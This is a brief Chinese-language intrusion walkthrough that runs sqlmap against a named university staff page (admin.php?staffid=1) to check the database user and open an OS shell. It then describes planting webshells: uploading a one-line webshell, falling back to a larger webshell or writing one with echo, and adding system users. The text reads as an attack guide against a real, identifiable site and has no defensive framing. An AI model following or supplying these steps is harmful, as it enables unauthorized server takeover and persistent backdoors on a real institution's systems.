过程:
D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --curren
t-user
必须是root权限
D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --os-shell
这里根据网站的实际情况来选择脚本语言
添加网站路径(必须的)
进入os_shell模式成功 就可以写shell了,分2种情况
1.可以看到带路径的直接访问这个路径地址
2.如果可以添加用户 也可以直接在下面输入命令添加
打开地址
上传一句话到目录就可以了
注:如果一句话之类的被拦截或者无法回显,可以测试直接上传大马
如果大马也失败的话 可以利用echo命令
